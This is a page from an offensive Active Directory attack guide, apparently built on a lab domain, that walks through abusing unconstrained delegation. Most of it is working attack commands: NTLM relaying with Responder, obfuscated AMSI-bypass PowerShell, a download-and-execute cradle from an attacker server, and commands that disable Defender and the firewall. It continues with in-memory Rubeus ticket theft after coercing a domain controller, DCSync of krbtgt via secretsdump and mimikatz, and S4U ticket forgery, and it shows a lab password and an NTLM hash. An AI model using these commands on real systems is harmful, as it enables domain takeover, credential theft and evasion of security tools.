Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Run ntlmrelayx.py and wait for a connecting for fernando.alonzo
  • Run Responder
  • Run smbeexe to get interactive shell
  1. Delegations

Unconstrained delegation Enum

PreviousResource Based Constrained DelegationNextTrust

Last updated 2 years ago

Unconstrained delegation is a configuration that attackers can potentially use to impersonate a user or service account and gain access to sensitive resources in an organization's network. To mitigate the risks associated with unconstrained delegation, organizations should take steps to fully understand such configurations, implement best practices regarding privilege, apply effective remediation steps, and replace unconstrained delegation with resource-based delegation wherever possible.

  • One way to find unconstrained delegation is to look in bloodhound 

MATCH (c {unconstraineddelegation:true}) return c

If you want to search for unconstrained delegation system (out of domain controller) :

MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Run smbeexe to get interactive shell

sudo proxychains smbexec.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22 -shell-type powershell

Prepare our server containing Rubeus.exe and our AMSI bypass.

python3 -m http.server 8080

On the shell session bypass AMSI :

#ByPass AMSI
powershell -ep bypass
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )



$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')|IEX

#check status of Defender

Get-MpComputerStatus

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
netsh advfirewall set allprofiles state off


#Default Writeable Folders
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing


#List AppLocker rules
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
Now launch Rubeus in memory with execute assembly.
First we will list the available tickets :

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.31:8080/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data);
[Rubeus.Program]::MainString("triage");

And now force a coerce of the DC NYC to the DC Bronx.

python3 coercer.py -u claudio.ortiz -d north.newyork.local -p bayboy -t NYC.Newyork.local -l Bronx

We look on the triage again :

[Rubeus.Program]::MainString("triage")

And now the tgt of NYC is present

To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)


[Rubeus.Program]::MainString("dump /user:NYC$ /service:krbtgt /nowrap");

We now have the TGT of the domain controller

Let’s continue on linux to pass the ticket and launch dcsync with secretdump :

copy the ticket without space and return line (in vim i do : :%s/\s*\n\s*//g) convert the ticket to ccache use the kerberos ticket and launch secretdump

cat tgt.b64|base64 -d > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/workspace/unconstrained/ticket.ccache
secretsdump.py -k -no-pass NEWYORK.LOCAL/'NYC$'@NYC
#Abusing FullControl using PowerView:
import-module .\powerview.ps1
Get-DomainComputer -TrustedToAuth


Triage All Current Tickets (If Elevated List all Users)
.\Rubeus.exe triage
s
List all Current Tickets in Details (If Elevated List all Users)
\Rubeus.exe klist



. .\Invoke-Mimikatz.ps1
invoke-mimikatz
aa81bb97a48748ad89541137bf78001f

#ask dc for a tgt for the student server
#Download kekeo:
https://github.com/gentilkiwi/kekeo/releases
kekeo.exe
tgt::ask /user:student$ /domain:pentesting.local /rc4:aa81bb97a48748ad89541137bf78001f

#ask dc for a tgs for the student server
tgs::s4u /tgt:TGT_student$@PENTESTING.LOCAL_krbtgt~pentesting.local@PENTESTING.LOCAL.kirbi /user:Administrator@pentesting.local /service:time/ad.pentesting.local|ldap/ad.pentesting.local

#use the tgs and inject it
. ..\..\invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@pentesting.local@PENTESTING.LOCAL_student$@PENTESTING.LOCAL.kirbi"'

#Dcsync to perform a goldent ticket attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:pentesting\krbtgt"'

#Look at this if it does not work:
https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203

#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

With a socks connection you can only use smbexec or atexec. Neither wmiexec, psexec nor dcomexec will work. (explainations here : )

https://github.com/SecureAuthCorp/impacket/issues/412